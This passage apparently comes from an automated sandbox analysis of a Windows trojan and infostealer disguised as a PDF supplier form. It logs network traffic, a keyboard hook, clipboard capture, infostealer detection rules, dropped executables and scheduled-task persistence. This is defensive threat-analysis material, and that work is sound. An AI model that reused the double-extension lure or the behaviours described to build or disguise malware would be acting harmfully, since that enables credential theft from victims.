45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:33 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:33 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Fri, 06 Sep 2024 11:07:56 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49714 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Creates files inside the system directory
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\52b8592e4ce608d8.bin
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Enables driver privileges
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Enables security privileges
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Uses 32bit PE files
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/105@105/81
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Users\user\AppData\Roaming\52b8592e4ce608d8.bin
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8-inf
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8fc030088-b
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Mutant created: \BaseNamedObjects\Global\Microsoft.Windows.Remediation.TelemetryUpdateHealthTools
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d89ea72c54-b
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Users\user\AppData\Local\Temp\aut72FF.tmp
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Virustotal: Detection: 71%
Source: unknown Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown Process created: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
